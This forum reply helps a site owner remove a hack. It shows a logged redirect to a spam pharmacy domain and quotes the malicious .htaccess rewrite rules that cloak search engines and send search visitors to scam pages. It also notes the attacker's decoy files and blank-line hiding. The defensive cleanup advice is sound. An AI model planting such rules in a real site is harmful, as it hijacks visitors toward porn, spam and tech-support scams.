woodenturner wrote:... Could be something that's been added to the .htaccess file...
After a bunch of looking and testing, I believe you hit the nail on the head with the .htaccess file.
----------------------------------------------------------------------------------------
A GET request is sent to 104.131.131.106:80
{request header}
Host: top-24h-can-store.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: -
http://top-24h-can-store.com/redirect.php?z=viagra
Connection: keep-alive
The remote host sets a 302 status (temporary redirect)
{response header}
Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html
Date: Sat, 30 Jul 2016 12:01:41 GMT
Keep-Alive: timeout=5, max=100
Location: -
http://1empiredirect.com/redirect?aff_i ... uid%3D2382
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: visited=1; expires=Thu, 04-Aug-2016 12:01:41 GMT; Max-Age=432000
X-Powered-By: PHP/5.5.9-1ubuntu4.3
And this is where everybody gets sent off to the porn and dating sites, and, eventually, if they try to back out instead of just closing the browser or right-clicking the 'back' button to get back to a point *before* the redirect, gets the fake computer virus warning with the scam 'tech support' phone number.
Tom, you need to ftp into the server and download the .htaccess file, it should be in the root directory and may be 'hidden'. The .htaccess file is an Apache system file, you may need to select something like "show hidden files" when you open your file manager. Once you locate the file check the content for code that looks like this:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ excrescent-interfacer.php?$1 [L]
and
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|Seznam|seznam)
RewriteRule . http: // top-24h-can-store . com /redirect.php?z=viagra [L]
There may be a "decoy" file, htaccess or .taccess to confuse the real file, and when you check the contents be sure you are scrolling all the way to the end of the file as hackers may add 100s of blank lines before any malicious directives.
You will need to clean up the .htaccess file and remove any "rogue" php files (if any, but I don't think there are, I think they keep the scripts on the other servers) to clean up the hack.
All you should have to do is delete that code as above, and the blank lines, save the file and then upload it back to the server---> make sure to *overwrite* the old .htaccess with the new one you just edited.
Once you've done this, the problem *should* be solved...except you'll need to change the login and password, it is obviously compromised.